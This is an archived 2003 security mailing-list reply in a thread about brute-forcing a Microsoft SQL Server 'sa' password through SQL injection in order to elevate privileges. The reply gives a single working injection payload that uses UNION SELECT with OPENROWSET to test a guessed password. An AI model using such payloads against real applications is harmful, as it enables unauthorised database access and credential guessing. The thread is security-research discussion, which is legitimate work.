Hosting Provided By

Re: Brute forcing a M$ SQL Server password through SQL Injection

From: David Litchfield <mnemonix(at)globalnet.co.uk>
Date: Thu Feb 20 2003 - 02:22:06 EST

>.....The goal is to elevate priviledges.

>How would you achieve this? ...

You need to take a look at OPENROWSET:

' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'testpass','SELECT @@version')--

Adhoc queries need to be enabled, though.

HTH,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/

Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box?
CORE IMPACT does.
http://www.securityfocus.com/core Received on Wed Feb 19 18:33:51 2003

Do you need help?

This message: [ Message body ]
Next message: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Previous message: Sanjiv K Agarwala: "RE: NetMeeting and H.323"
In reply to: Roman Medina: "Brute forcing a M$ SQL Server password through SQL Injection"
Next in thread: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:33 EDT